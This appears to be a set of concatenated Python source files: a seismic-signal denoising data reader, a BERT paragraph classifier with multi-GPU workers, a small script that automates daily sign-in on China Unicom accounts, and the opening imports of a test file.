# t_interp = np.arange(nt, dtype="int")
# std_interp = interp1d(t, std, kind="slinear")(t_interp)
# mean_interp = interp1d(t, mean, kind="slinear")(t_interp)
# data = (data - mean_interp)/(std_interp)
# return data, std_interp
# %%
def normalize(data, window=200):
"""
data: nsta, chn, nt
"""
shift = window // 2
nt = data.shape[1]
## std in slide windows
data_pad = np.pad(data, ((0, 0), (window // 2, window // 2), (0, 0)), mode="reflect")
t = np.arange(0, nt, shift, dtype="int")
# print(f"nt = {nt}, nt+window//2 = {nt+window//2}")
std = np.zeros(len(t))
mean = np.zeros(len(t))
for i in range(len(std)):
std[i] = np.std(data_pad[:, i * shift : i * shift + window, :])
mean[i] = np.mean(data_pad[:, i * shift : i * shift + window, :])
t = np.append(t, nt)
std = np.append(std, [np.std(data_pad[:, -window:, :])])
mean = np.append(mean, [np.mean(data_pad[:, -window:, :])])
# print(t)
## normalize data with interplated std
t_interp = np.arange(nt, dtype="int")
std_interp = interp1d(t, std, kind="slinear")(t_interp)
std_interp[std_interp == 0] = 1.0
mean_interp = interp1d(t, mean, kind="slinear")(t_interp)
data = (data - mean_interp[np.newaxis, :, np.newaxis]) / std_interp[np.newaxis, :, np.newaxis]
return data, std_interp
def normalize_batch(data, window=200):
"""
data: nbn, nf, nt, 2
"""
assert len(data.shape) == 4
shift = window // 2
nbt, nf, nt, nimg = data.shape
## std in slide windows
data_pad = np.pad(data, ((0, 0), (0, 0), (window // 2, window // 2), (0, 0)), mode="reflect")
t = np.arange(0, nt + shift - 1, shift, dtype="int") # 201 => 0, 100, 200
std = np.zeros([nbt, len(t)])
mean = np.zeros([nbt, len(t)])
for i in range(std.shape[1]):
std[:, i] = np.std(data_pad[:, :, i * shift : i * shift + window, :], axis=(1, 2, 3))
mean[:, i] = np.mean(data_pad[:, :, i * shift : i * shift + window, :], axis=(1, 2, 3))
std[:, -1], mean[:, -1] = std[:, -2], mean[:, -2]
std[:, 0], mean[:, 0] = std[:, 1], mean[:, 1]
## normalize data with interplated std
t_interp = np.arange(nt, dtype="int")
std_interp = interp1d(t, std, kind="slinear")(t_interp) ##nbt, nt
std_interp[std_interp == 0] = 1.0
mean_interp = interp1d(t, mean, kind="slinear")(t_interp)
data = (data - mean_interp[:, np.newaxis, :, np.newaxis]) / std_interp[:, np.newaxis, :, np.newaxis]
if len(t) > 3: ##need to address this normalization issue in training
data /= 2.0
return data
# %%
def py_func_decorator(output_types=None, output_shapes=None, name=None):
def decorator(func):
def call(*args, **kwargs):
nonlocal output_shapes
# flat_output_types = nest.flatten(output_types)
flat_output_types = tf.nest.flatten(output_types)
# flat_values = tf.py_func(
flat_values = tf.numpy_function(func, inp=args, Tout=flat_output_types, name=name)
if output_shapes is not None:
for v, s in zip(flat_values, output_shapes):
v.set_shape(s)
# return nest.pack_sequence_as(output_types, flat_values)
return tf.nest.pack_sequence_as(output_types, flat_values)
return call
return decorator
def dataset_map(iterator, output_types, output_shapes=None, num_parallel_calls=None, name=None):
dataset = tf.data.Dataset.range(len(iterator))
@py_func_decorator(output_types, output_shapes, name=name)
def index_to_entry(idx):
return iterator[idx]
return dataset.map(index_to_entry, num_parallel_calls=num_parallel_calls)
class DataReader(object):
def __init__(
self,
signal_dir=None,
signal_list=None,
noise_dir=None,
noise_list=None,
queue_size=None,
coord=None,
config=Config(),
):
self.config = config
signal_list = pd.read_csv(signal_list, header=0)
noise_list = pd.read_csv(noise_list, header=0)
self.signal = signal_list
self.noise = noise_list
self.n_signal = len(self.signal)
self.signal_dir = signal_dir
self.noise_dir = noise_dir
self.X_shape = config.X_shape
self.Y_shape = config.Y_shape
self.n_class = config.n_class
self.coord = coord
self.threads = []
self.queue_size = queue_size
self.add_queue()
self.buffer_signal = {}
self.buffer_noise = {}
self.buffer_channels_signal = {}
self.buffer_channels_noise = {}
def add_queue(self):
with tf.device('/cpu:0'):
self.sample_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
self.target_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
self.queue = tf.queue.PaddingFIFOQueue(
self.queue_size, ['float32', 'float32'], shapes=[self.config.X_shape, self.config.Y_shape]
)
self.enqueue = self.queue.enqueue([self.sample_placeholder, self.target_placeholder])
return 0
def dequeue(self, num_elements):
output = self.queue.dequeue_many(num_elements)
return output
def get_snr(self, data, itp, dit=300):
tmp_std = np.std(data[itp - dit : itp])
if tmp_std > 0:
return np.std(data[itp : itp + dit]) / tmp_std
else:
return 0
def add_event(self, sample, channels, j):
while np.random.uniform(0, 1) < 0.2:
shift = None
if channels not in self.buffer_channels_signal:
self.buffer_channels_signal[channels] = self.signal[self.signal['channels'] == channels]
fname = os.path.join(self.signal_dir, self.buffer_channels_signal[channels].sample(n=1).iloc[0]['fname'])
try:
if fname not in self.buffer_signal:
meta = np.load(fname)
data_FT = []
snr = []
for i in range(3):
tmp_data = meta['data'][:, i]
tmp_itp = meta['itp']
snr.append(self.get_snr(tmp_data, tmp_itp))
tmp_data -= np.mean(tmp_data)
f, t, tmp_FT = scipy.signal.stft(
tmp_data,
fs=self.config.fs,
nperseg=self.config.nperseg,
nfft=self.config.nfft,
boundary='zeros',
)
data_FT.append(tmp_FT)
data_FT = np.stack(data_FT, axis=-1)
self.buffer_signal[fname] = {
'data_FT': data_FT,
'itp': tmp_itp,
'channels': meta['channels'],
'snr': snr,
}
meta_signal = self.buffer_signal[fname]
except:
logging.error("Failed reading signal: {}".format(fname))
continue
if meta_signal['snr'][j] > self.config.snr_threshold:
tmp_signal = np.zeros([self.X_shape[0], self.X_shape[1]], dtype=np.complex_)
shift = np.random.randint(-self.X_shape[1], 1, None, 'int')
tmp_signal[:, -shift:] = meta_signal['data_FT'][:, self.X_shape[1] : 2 * self.X_shape[1] + shift, j]
if np.isinf(tmp_signal).any() or np.isnan(tmp_signal).any() or (not np.any(tmp_signal)):
continue
tmp_signal = tmp_signal / np.std(tmp_signal)
sample += tmp_signal / np.random.uniform(1, 5)
return sample
def thread_main(self, sess, n_threads=1, start=0):
stop = False
while not stop:
index = list(range(start, self.n_signal, n_threads))
np.random.shuffle(index)
for i in index:
fname_signal = os.path.join(self.signal_dir, self.signal.iloc[i]['fname'])
try:
if fname_signal not in self.buffer_signal:
meta = np.load(fname_signal)
data_FT = []
snr = []
for j in range(3):
tmp_data = meta['data'][..., j]
tmp_itp = meta['itp']
snr.append(self.get_snr(tmp_data, tmp_itp))
tmp_data -= np.mean(tmp_data)
f, t, tmp_FT = scipy.signal.stft(
tmp_data,
fs=self.config.fs,
nperseg=self.config.nperseg,
nfft=self.config.nfft,
boundary='zeros',
)
data_FT.append(tmp_FT)
data_FT = np.stack(data_FT, axis=-1)
self.buffer_signal[fname_signal] = {
'data_FT': data_FT,
'itp': tmp_itp,
'channels': meta['channels'],
'snr': snr,
}
meta_signal = self.buffer_signal[fname_signal]
except:
logging.error("Failed reading signal: {}".format(fname_signal))
continue
channels = meta_signal['channels'].tolist()
start_tp = meta_signal['itp'].tolist()
if channels not in self.buffer_channels_noise:
self.buffer_channels_noise[channels] = self.noise[self.noise['channels'] == channels]
fname_noise = os.path.join(
self.noise_dir, self.buffer_channels_noise[channels].sample(n=1).iloc[0]['fname']
)
try:
if fname_noise not in self.buffer_noise:
meta = np.load(fname_noise)
data_FT = []
for i in range(3):
tmp_data = meta['data'][: self.config.nt, i]
tmp_data -= np.mean(tmp_data)
f, t, tmp_FT = scipy.signal.stft(
tmp_data,
fs=self.config.fs,
nperseg=self.config.nperseg,
nfft=self.config.nfft,
boundary='zeros',
)
data_FT.append(tmp_FT)
data_FT = np.stack(data_FT, axis=-1)
self.buffer_noise[fname_noise] = {'data_FT': data_FT, 'channels': meta['channels']}
meta_noise = self.buffer_noise[fname_noise]
except:
logging.error("Failed reading noise: {}".format(fname_noise))
continue
if self.coord.should_stop():
stop = True
break
j = np.random.choice([0, 1, 2])
if meta_signal['snr'][j] <= self.config.snr_threshold:
continue
tmp_noise = meta_noise['data_FT'][..., j]
if np.isinf(tmp_noise).any() or np.isnan(tmp_noise).any() or (not np.any(tmp_noise)):
continue
tmp_noise = tmp_noise / np.std(tmp_noise)
tmp_signal = np.zeros([self.X_shape[0], self.X_shape[1]], dtype=np.complex_)
if np.random.random() < 0.9:
shift = np.random.randint(-self.X_shape[1], 1, None, 'int')
tmp_signal[:, -shift:] = meta_signal['data_FT'][:, self.X_shape[1] : 2 * self.X_shape[1] + shift, j]
if np.isinf(tmp_signal).any() or np.isnan(tmp_signal).any() or (not np.any(tmp_signal)):
continue
tmp_signal = tmp_signal / np.std(tmp_signal)
tmp_signal = self.add_event(tmp_signal, channels, j)
if np.random.random() < 0.2:
tmp_signal = np.fliplr(tmp_signal)
ratio = 0
while ratio <= 0:
ratio = self.config.noise_mean + np.random.randn() * self.config.noise_std
# ratio = np.random.uniform(self.config.noise_low, self.config.noise_high)
tmp_noisy_signal = tmp_signal + ratio * tmp_noise
noisy_signal = np.stack([tmp_noisy_signal.real, tmp_noisy_signal.imag], axis=-1)
if np.isnan(noisy_signal).any() or np.isinf(noisy_signal).any():
continue
noisy_signal = noisy_signal / np.std(noisy_signal)
tmp_mask = np.abs(tmp_signal) / (np.abs(tmp_signal) + np.abs(ratio * tmp_noise) + 1e-4)
tmp_mask[tmp_mask >= 1] = 1
tmp_mask[tmp_mask <= 0] = 0
mask = np.zeros([tmp_mask.shape[0], tmp_mask.shape[1], self.n_class])
mask[:, :, 0] = tmp_mask
mask[:, :, 1] = 1 - tmp_mask
sess.run(self.enqueue, feed_dict={self.sample_placeholder: noisy_signal, self.target_placeholder: mask})
def start_threads(self, sess, n_threads=8):
for i in range(n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess, n_threads, i))
thread.daemon = True
thread.start()
self.threads.append(thread)
return self.threads
class DataReader_test(DataReader):
def __init__(
self,
signal_dir=None,
signal_list=None,
noise_dir=None,
noise_list=None,
queue_size=None,
coord=None,
config=Config(),
):
self.config = config
signal_list = pd.read_csv(signal_list, header=0)
noise_list = pd.read_csv(noise_list, header=0)
self.signal = signal_list
self.noise = noise_list
self.n_signal = len(self.signal)
self.signal_dir = signal_dir
self.noise_dir = noise_dir
self.X_shape = config.X_shape
self.Y_shape = config.Y_shape
self.n_class = config.n_class
self.coord = coord
self.threads = []
self.queue_size = queue_size
self.add_queue()
self.buffer_signal = {}
self.buffer_noise = {}
self.buffer_channels_signal = {}
self.buffer_channels_noise = {}
def add_queue(self):
self.sample_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
self.target_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
self.ratio_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
self.signal_placeholder = tf.compat.v1.placeholder(dtype=tf.complex64, shape=None)
self.noise_placeholder = tf.compat.v1.placeholder(dtype=tf.complex64, shape=None)
self.fname_placeholder = tf.compat.v1.placeholder(dtype=tf.string, shape=None)
self.queue = tf.queue.PaddingFIFOQueue(
self.queue_size,
['float32', 'float32', 'float32', 'complex64', 'complex64', 'string'],
shapes=[
self.config.X_shape,
self.config.Y_shape,
[],
self.config.signal_shape,
self.config.noise_shape,
[],
],
)
self.enqueue = self.queue.enqueue(
[
self.sample_placeholder,
self.target_placeholder,
self.ratio_placeholder,
self.signal_placeholder,
self.noise_placeholder,
self.fname_placeholder,
]
)
return 0
def dequeue(self, num_elements):
output = self.queue.dequeue_up_to(num_elements)
return output
def thread_main(self, sess, n_threads=1, start=0):
index = list(range(start, self.n_signal, n_threads))
for i in index:
np.random.seed(i)
fname = self.signal.iloc[i]['fname']
fname_signal = os.path.join(self.signal_dir, fname)
meta = np.load(fname_signal)
data_FT = []
snr = []
for j in range(3):
tmp_data = meta['data'][..., j]
tmp_itp = meta['itp']
snr.append(self.get_snr(tmp_data, tmp_itp))
tmp_data -= np.mean(tmp_data)
f, t, tmp_FT = scipy.signal.stft(
tmp_data, fs=self.config.fs, nperseg=self.config.nperseg, nfft=self.config.nfft, boundary='zeros'
)
data_FT.append(tmp_FT)
data_FT = np.stack(data_FT, axis=-1)
meta_signal = {'data_FT': data_FT, 'itp': tmp_itp, 'channels': meta['channels'], 'snr': snr}
channels = meta['channels'].tolist()
start_tp = meta['itp'].tolist()
if channels not in self.buffer_channels_noise:
self.buffer_channels_noise[channels] = self.noise[self.noise['channels'] == channels]
fname_noise = os.path.join(
self.noise_dir, self.buffer_channels_noise[channels].sample(n=1, random_state=i).iloc[0]['fname']
)
meta = np.load(fname_noise)
data_FT = []
for i in range(3):
tmp_data = meta['data'][: self.config.nt, i]
tmp_data -= np.mean(tmp_data)
f, t, tmp_FT = scipy.signal.stft(
tmp_data, fs=self.config.fs, nperseg=self.config.nperseg, nfft=self.config.nfft, boundary='zeros'
)
data_FT.append(tmp_FT)
data_FT = np.stack(data_FT, axis=-1)
meta_noise = {'data_FT': data_FT, 'channels': meta['channels']}
if self.coord.should_stop():
stop = True
break
j = np.random.choice([0, 1, 2])
tmp_noise = meta_noise['data_FT'][..., j]
if np.isinf(tmp_noise).any() or np.isnan(tmp_noise).any() or (not np.any(tmp_noise)):
continue
tmp_noise = tmp_noise / np.std(tmp_noise)
tmp_signal = np.zeros([self.X_shape[0], self.X_shape[1]], dtype=np.complex_)
if np.random.random() < 0.9:
shift = np.random.randint(-self.X_shape[1], 1, None, 'int')
tmp_signal[:, -shift:] = meta_signal['data_FT'][:, self.X_shape[1] : 2 * self.X_shape[1] + shift, j]
if np.isinf(tmp_signal).any() or np.isnan(tmp_signal).any() or (not np.any(tmp_signal)):
continue
tmp_signal = tmp_signal / np.std(tmp_signal)
# tmp_signal = self.add_event(tmp_signal, channels, j)
# if np.random.random() < 0.2:
# tmp_signal = np.fliplr(tmp_signal)
ratio = 0
while ratio <= 0:
ratio = self.config.noise_mean + np.random.randn() * self.config.noise_std
tmp_noisy_signal = tmp_signal + ratio * tmp_noise
noisy_signal = np.stack([tmp_noisy_signal.real, tmp_noisy_signal.imag], axis=-1)
if np.isnan(noisy_signal).any() or np.isinf(noisy_signal).any():
continue
std_noisy_signal = np.std(noisy_signal)
noisy_signal = noisy_signal / std_noisy_signal
tmp_mask = np.abs(tmp_signal) / (np.abs(tmp_signal) + np.abs(ratio * tmp_noise) + 1e-4)
tmp_mask[tmp_mask >= 1] = 1
tmp_mask[tmp_mask <= 0] = 0
mask = np.zeros([tmp_mask.shape[0], tmp_mask.shape[1], self.n_class])
mask[:, :, 0] = tmp_mask
mask[:, :, 1] = 1 - tmp_mask
sess.run(
self.enqueue,
feed_dict={
self.sample_placeholder: noisy_signal,
self.target_placeholder: mask,
self.ratio_placeholder: std_noisy_signal,
self.signal_placeholder: tmp_signal,
self.noise_placeholder: ratio * tmp_noise,
self.fname_placeholder: fname,
},
)
class DataReader_pred_queue(DataReader):
def __init__(self, signal_dir, signal_list, queue_size, coord, config=Config()):
self.config = config
signal_list = pd.read_csv(signal_list)
self.signal = signal_list
self.n_signal = len(self.signal)
self.n_class = config.n_class
self.X_shape = config.X_shape
self.Y_shape = config.Y_shape
self.signal_dir = signal_dir
self.coord = coord
self.threads = []
self.queue_size = queue_size
self.add_placeholder()
def add_placeholder(self):
self.sample_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
self.ratio_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
self.fname_placeholder = tf.compat.v1.placeholder(dtype=tf.string, shape=None)
self.queue = tf.queue.PaddingFIFOQueue(
self.queue_size, ['float32', 'float32', 'string'], shapes=[self.config.X_shape, [], []]
)
self.enqueue = self.queue.enqueue([self.sample_placeholder, self.ratio_placeholder, self.fname_placeholder])
def dequeue(self, num_elements):
output = self.queue.dequeue_up_to(num_elements)
return output
def thread_main(self, sess, n_threads=1, start=0):
index = list(range(start, self.n_signal, n_threads))
shift = 0
for i in index:
fname = self.signal.iloc[i]['fname']
data_signal = np.load(os.path.join(self.signal_dir, fname))
f, t, tmp_signal = scipy.signal.stft(
scipy.signal.detrend(np.squeeze(data_signal['data'][shift : self.config.nt + shift])),
fs=self.config.fs,
nperseg=self.config.nperseg,
nfft=self.config.nfft,
boundary='zeros',
)
noisy_signal = np.stack([tmp_signal.real, tmp_signal.imag], axis=-1)
if np.isnan(noisy_signal).any() or np.isinf(noisy_signal).any() or (not np.any(noisy_signal)):
continue
std_noisy_signal = np.std(noisy_signal)
if std_noisy_signal == 0:
continue
noisy_signal = noisy_signal / std_noisy_signal
sess.run(
self.enqueue,
feed_dict={
self.sample_placeholder: noisy_signal,
self.ratio_placeholder: std_noisy_signal,
self.fname_placeholder: fname,
},
)
class DataReader_pred:
def __init__(self, signal_dir, signal_list, format="numpy", sampling_rate=100, config=Config()):
self.buffer = {}
self.config = config
self.format = format
self.dtype = "float32"
try:
signal_list = pd.read_csv(signal_list, sep="\t")["fname"]
except:
signal_list = pd.read_csv(signal_list)["fname"]
self.signal_list = signal_list
self.n_signal = len(self.signal_list)
self.signal_dir = signal_dir
self.sampling_rate = sampling_rate
self.n_class = config.n_class
FT_shape = self.get_data_shape()
self.X_shape = [*FT_shape, 2]
def get_data_shape(self):
# fname = self.signal_list.iloc[0]['fname']
# data = np.load(os.path.join(self.signal_dir, fname), allow_pickle=True)["data"]
# data = np.squeeze(data)
base_name = self.signal_list[0]
if self.format == "numpy":
meta = self.read_numpy(os.path.join(self.signal_dir, base_name))
elif self.format == "mseed":
meta = self.read_mseed(os.path.join(self.signal_dir, base_name))
elif self.format == "hdf5":
meta = self.read_hdf5(base_name)
data = meta["data"]
data = np.transpose(data, [2, 1, 0])
if self.sampling_rate != 100:
t = np.linspace(0, 1, data.shape[-1])
t_interp = np.linspace(0, 1, np.int(np.around(data.shape[-1] * 100.0 / self.sampling_rate)))
data = interp1d(t, data, kind="slinear")(t_interp)
f, t, tmp_signal = scipy.signal.stft(
data, fs=self.config.fs, nperseg=self.config.nperseg, nfft=self.config.nfft, boundary='zeros'
)
logging.info(f"Input data shape: {tmp_signal.shape} measured on file {base_name}")
return tmp_signal.shape
def __len__(self):
return self.n_signal
def read_numpy(self, fname):
# try:
if fname not in self.buffer:
npz = np.load(fname)
meta = {}
if len(npz['data'].shape) == 1:
meta["data"] = npz['data'][:, np.newaxis, np.newaxis]
elif len(npz['data'].shape) == 2:
meta["data"] = npz['data'][:, np.newaxis, :]
else:
meta["data"] = npz['data']
if "p_idx" in npz.files:
if len(npz["p_idx"].shape) == 0:
meta["itp"] = [[npz["p_idx"]]]
else:
meta["itp"] = npz["p_idx"]
if "s_idx" in npz.files:
if len(npz["s_idx"].shape) == 0:
meta["its"] = [[npz["s_idx"]]]
else:
meta["its"] = npz["s_idx"]
if "t0" in npz.files:
meta["t0"] = npz["t0"]
self.buffer[fname] = meta
else:
meta = self.buffer[fname]
return meta
# except:
# logging.error("Failed reading {}".format(fname))
# return None
def read_hdf5(self, fname):
data = self.h5_data[fname][()]
attrs = self.h5_data[fname].attrs
meta = {}
if len(data.shape) == 2:
meta["data"] = data[:, np.newaxis, :]
else:
meta["data"] = data
if "p_idx" in attrs:
if len(attrs["p_idx"].shape) == 0:
meta["itp"] = [[attrs["p_idx"]]]
else:
meta["itp"] = attrs["p_idx"]
if "s_idx" in attrs:
if len(attrs["s_idx"].shape) == 0:
meta["its"] = [[attrs["s_idx"]]]
else:
meta["its"] = attrs["s_idx"]
if "t0" in attrs:
meta["t0"] = attrs["t0"]
return meta
def read_s3(self, format, fname, bucket, key, secret, s3_url, use_ssl):
with self.s3fs.open(bucket + "/" + fname, 'rb') as fp:
if format == "numpy":
meta = self.read_numpy(fp)
elif format == "mseed":
meta = self.read_mseed(fp)
else:
raise (f"Format {format} not supported")
return meta
def read_mseed(self, fname):
mseed = obspy.read(fname)
mseed = mseed.detrend("spline", order=2, dspline=5 * mseed[0].stats.sampling_rate)
mseed = mseed.merge(fill_value=0)
starttime = min([st.stats.starttime for st in mseed])
endtime = max([st.stats.endtime for st in mseed])
mseed = mseed.trim(starttime, endtime, pad=True, fill_value=0)
if mseed[0].stats.sampling_rate != self.sampling_rate:
logging.warning(f"Sampling rate {mseed[0].stats.sampling_rate} != {self.sampling_rate} Hz")
order = ['3', '2', '1', 'E', 'N', 'Z']
order = {key: i for i, key in enumerate(order)}
comp2idx = {"3": 0, "2": 1, "1": 2, "E": 0, "N": 1, "Z": 2}
t0 = starttime.strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3]
nt = len(mseed[0].data)
data = np.zeros([nt, 3], dtype=self.dtype)
ids = [x.get_id() for x in mseed]
if len(ids) == 3:
for j, id in enumerate(sorted(ids, key=lambda x: order[x[-1]])):
data[:, j] = mseed.select(id=id)[0].data.astype(self.dtype)
else:
if len(ids) > 3:
logging.warning(f"More than 3 channels {ids}!")
for jj, id in enumerate(ids):
j = comp2idx[id[-1]]
data[:, j] = mseed.select(id=id)[0].data.astype(self.dtype)
data = data[:, np.newaxis, :]
meta = {"data": data, "t0": t0}
return meta
def __getitem__(self, i):
# fname = self.signal.iloc[i]['fname']
# data = np.load(os.path.join(self.signal_dir, fname), allow_pickle=True)["data"]
# data = np.squeeze(data)
base_name = self.signal_list[i]
if self.format == "numpy":
meta = self.read_numpy(os.path.join(self.signal_dir, base_name))
elif self.format == "mseed":
meta = self.read_mseed(os.path.join(self.signal_dir, base_name))
elif self.format == "hdf5":
meta = self.read_hdf5(base_name)
data = meta["data"] # nt, 1, nch
data = np.transpose(data, [2, 1, 0]) # nch, 1, nt
if np.mod(data.shape[-1], 3000) == 1: # 3001=>3000
data = data[..., :-1]
if "t0" in meta:
t0 = meta["t0"]
else:
t0 = "1970-01-01T00:00:00.000"
if self.sampling_rate != 100:
logging.warning(f"Resample from {self.sampling_rate} to 100!")
t = np.linspace(0, 1, data.shape[-1])
t_interp = np.linspace(0, 1, np.int(np.around(data.shape[-1] * 100.0 / self.sampling_rate)))
data = interp1d(t, data, kind="slinear")(t_interp)
# sos = scipy.signal.butter(4, 0.1, 'high', fs=100, output='sos') ## for stability of long sequence
# data = scipy.signal.sosfilt(sos, data)
f, t, tmp_signal = scipy.signal.stft(
data, fs=self.config.fs, nperseg=self.config.nperseg, nfft=self.config.nfft, boundary='zeros'
) # nch, 1, nf, nt
noisy_signal = np.stack([tmp_signal.real, tmp_signal.imag], axis=-1) # nch, 1, nf, nt, 2
noisy_signal[np.isnan(noisy_signal)] = 0
noisy_signal[np.isinf(noisy_signal)] = 0
# noisy_signal, std_noisy_signal = normalize(noisy_signal)
# return noisy_signal.astype(self.dtype), std_noisy_signal.astype(self.dtype), fname
return noisy_signal.astype(self.dtype), base_name, t0
def dataset(self, batch_size, num_parallel_calls=4):
dataset = dataset_map(
self,
output_types=(self.dtype, "string", "string"),
output_shapes=(self.X_shape, None, None),
num_parallel_calls=num_parallel_calls,
)
dataset = tf.compat.v1.data.make_one_shot_iterator(
dataset.batch(batch_size).prefetch(batch_size * 3)
).get_next()
return dataset
if __name__ == "__main__":
# %%
data_reader = DataReader_pred(signal_dir="./Dataset/yixiao/", signal_list="./Dataset/yixiao.csv")
noisy_signal, std_noisy_signal, fname = data_reader[0]
print(noisy_signal.shape, std_noisy_signal.shape, fname)
batch = data_reader.dataset(10)
init = tf.compat.v1.initialize_all_variables()
sess = tf.compat.v1.Session()
sess.run(init)
print(sess.run(batch))
|
pclassifier.py | import logging
from multiprocessing import get_context
from typing import List, Dict, Tuple, Union
import torch
from numpy import ndarray
from scipy.special import softmax
from torch import Tensor
from torch.nn.utils.rnn import pad_sequence
from transformers import BertTokenizerFast, BertForSequenceClassification
from synthesis_classifier.model import labels, max_input, get_model
from synthesis_classifier.utils import torch_dev
__all__ = [
'run_batch', 'paragraphs2batch', 'get_classification_scores',
'batch2tensor', 'batch2numpy',
'MultiprocessingClassifier',
]
__author__ = 'Haoyan Huo'
__email__ = 'haoyan.huo@lbl.gov'
__maintainer__ = 'Haoyan Huo'
def get_classification_scores(model_output: Tensor) -> List[Dict]:
"""
Compute classifier scores of a batched model output.
:param model_output: Outputs Tensor[Batch, 5] from a classifier model.
:return: List of classifier scores in dict.
"""
outputs = model_output.cpu().numpy()
scores = softmax(outputs, axis=1)
results = []
for i, _scores in enumerate(scores):
_scores = {name: value.item() for
name, value in zip(labels, _scores)}
results.append(_scores)
return results
@torch.no_grad()
def run_batch(batch_text: List[str],
model: BertForSequenceClassification,
tokenizer: BertTokenizerFast) -> List[Dict]:
"""
Run model classifier for a list of paragraphs.
:param batch_text: List of paragraph strings.
:param model: The paragraph classifier.
:param tokenizer: The BERT tokenizer.
:return: Classification result represented using a dict.
"""
all_tokenized, batch = paragraphs2batch(batch_text, tokenizer)
model.eval()
# Make sure they are on the right dev
for key, value in batch.items():
batch[key] = value.to(torch_dev())
outputs = model(**batch, return_dict=True).logits
scores = get_classification_scores(outputs)
results = [{
'text': batch_text[i],
'tokens': all_tokenized[i],
'scores': scores[i]
} for i in range(len(batch_text))]
return results
def paragraphs2batch(paragraphs: List[str], tokenizer: BertTokenizerFast) -> \
Tuple[List[List[str]], Dict]:
"""
Convert a list of paragraphs to a batch. This essentially does these things:
1. Tokenize paragraphs.
2. Pad all input_ids tensors, remove excessively long input_ids.
3. Generate the correct attention_masks.
:param paragraphs: List of paragraphs.
:param tokenizer: The BERT tokenizer.
:return: Tokenized paragraphs and the batch that can be used as model inputs.
"""
all_tokenized = []
input_ids = []
attention_mask = []
for p in paragraphs:
tokenized = tokenizer.tokenize(p)
all_tokenized.append(tokenized)
one_hot = tokenizer.convert_tokens_to_ids(tokenized)
input_ids.append(torch.tensor(one_hot, dtype=torch.long))
attention_mask.append(torch.ones_like(input_ids[-1], dtype=torch.float))
input_ids = pad_sequence(input_ids, batch_first=True, padding_value=0)
input_ids = input_ids[:, :max_input]
attention_mask = pad_sequence(attention_mask, batch_first=True, padding_value=0.)
attention_mask = attention_mask[:, :max_input]
return all_tokenized, {
'input_ids': input_ids,
'attention_mask': attention_mask,
}
def batch2numpy(batch: Union[Dict, Tensor]):
"""
Convert a batch into numpy arrays (that are easier to pickle).
"""
if isinstance(batch, dict):
return {key: batch2numpy(value) for key, value in batch.items()}
elif isinstance(batch, Tensor):
return batch.detach().cpu().numpy()
else:
raise TypeError('Unknown batch type %s to numpy' % type(batch))
def batch2tensor(batch: Union[Dict, ndarray]):
"""
Convert a batch represented by numpy arrays into Tensors (for model input).
"""
if isinstance(batch, dict):
return {key: batch2tensor(value) for key, value in batch.items()}
elif isinstance(batch, ndarray):
return torch.from_numpy(batch).to(torch_dev())
else:
raise TypeError('Unknown batch type to tensor %s' % type(batch))
def subprocess_classifier(queue, db_writer_queue, dev_id=0):
"""
This is the worker classifier that runs in a subprocess.
It actively retrieves tokenized and batched (to maximize GPU utilization)
inputs from a queue and performs paragraph classification. Then, the results
are sent into a database writer queue to be collected and saved in database.
The process can be terminated by sending a None as the EOF symbol.
:param queue: A queue form which (meta_ids, batch_numpy) will be yielded.
:param db_writer_queue: A queue to which (meta_ids, list of class scores) will be sent.
:param dev_id: Optional device id to be set in PyTorch.
"""
torch.cuda.set_device(dev_id)
model = get_model()
logging.info('Device %d ready to classify text.', dev_id)
while True:
batch_items = queue.get()
if batch_items is None:
break
meta_ids, batch_numpy = batch_items
batch = batch2tensor(batch_numpy)
with torch.no_grad():
output = model(**batch, return_dict=True)
hidden_states = output.hidden_states[0].detach().cpu().numpy()
scores = get_classification_scores(output.logits)
db_writer_queue.put((meta_ids, scores, hidden_states))
class MultiprocessingClassifier(object):
"""
A classifier that spawns multiple processes to use up all GPU
resources installed on a machine.
"""
def __init__(self, db_writer_queue):
"""
Create a new multiprocessing classifier. The queues of subprocess
classifiers can be obtained by accessing self.queues or using the
following "with" codes:
with MultiprocessingClassifier(writer_queue) as queues:
# do stuff and send batches to queues
:param db_writer_queue: The database writer queue that will be used by
subprocess workers to send classifier results to.
"""
n_gpus = torch.cuda.device_count()
assert n_gpus > 0, "Must have at least one GPU!"
logging.info('Spawning %d processes.', n_gpus)
self.mp_ctx = get_context('spawn')
self.queues = [self.mp_ctx.Queue(maxsize=16) for _ in range(n_gpus)]
self.subprocesses = [self.mp_ctx.Process(
target=subprocess_classifier, args=(self.queues[i], db_writer_queue, i)
) for i in range(n_gpus)]
[process.start() for process in self.subprocesses]
def __enter__(self):
return self.queues
def send_eof(self):
"""
Send EOF to subprocess workers.
"""
for q in self.queues:
q.put(None)
def wait(self):
"""
Wait for subprocess workers to finish.
"""
for process in self.subprocesses:
process.join()
def __exit__(self, exc_type, exc_val, exc_tb):
self.send_eof()
self.wait()
|
login.py | # -*- coding: utf8 -*-
from threading import Thread
from activity.unicom.dailySign import SigninApp
from utils.unicomLogin import UnicomClient
import json
import time
import requests
from utils.config import account_json,account
class LoginAgain(UnicomClient):
"""
签到页积分任务
"""
def __init__(self, mobile, password):
super(LoginAgain, self).__init__(mobile, password)
self.session.headers = requests.structures.CaseInsensitiveDict({
"accept": "application/json, text/plain, */*",
"origin": "https://img.client.10010.com",
"user-agent": self.useragent,
"content-type": "application/x-www-form-urlencoded",
"referer": "https://img.client.10010.com/SigininApp/index.html",
"x-requested-with": "com.sinovatech.unicom.ui"
})
self.login()
def Template(cls):
# 联通手机号 服务密码 配置 (支持多账号)
ts = []
for key in account_json.keys():
ts.append(Thread(target=cls(key, account_json[key]['password']).run))
for t in ts:
t.start()
for t in ts:
t.join()
def main_handler(event=None, context=None):
"""
腾讯云函数每15分钟执行一次
"""
# ----------------------------------------------------------------
# 使用华为云函数工作流 (腾讯云函数、阿里函数计算 ip在获取积分接口被限制)
# 联通每日签到
Template(LoginAgain)
if __name__ == '__main__':
main_handler("","") |
materialize_with_ddl.py | import time
import pymysql.cursors
import pytest
from helpers.network import PartitionManager
import logging
from helpers.client import QueryRuntimeException
